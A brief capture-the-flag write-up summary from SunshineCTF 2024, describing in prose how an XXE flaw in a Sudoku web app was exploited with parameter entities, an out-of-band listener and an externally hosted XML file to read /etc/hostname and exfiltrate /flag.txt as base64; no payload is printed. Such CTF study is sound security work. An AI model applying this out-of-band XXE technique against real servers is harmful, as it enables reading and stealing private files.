The challenge involved uploading a custom XML file to a Sudoku web application with a restrictive XML structure that required the use of parameter entities. By setting up an out-of-band (OOB) listener,I successfully tested for XXE by referencing an external entity and extracted the /etc/hostname and later the /flag.txt file. The solution involved hosting an external XML file that defined parameter entities to exfiltrate the base64-encoded flag data.

Original writeup (https://humble-raptor-f30.notion.site/SunshineCTF-2024-1254c8e5237680128414c01ddd42cc09?pvs=4).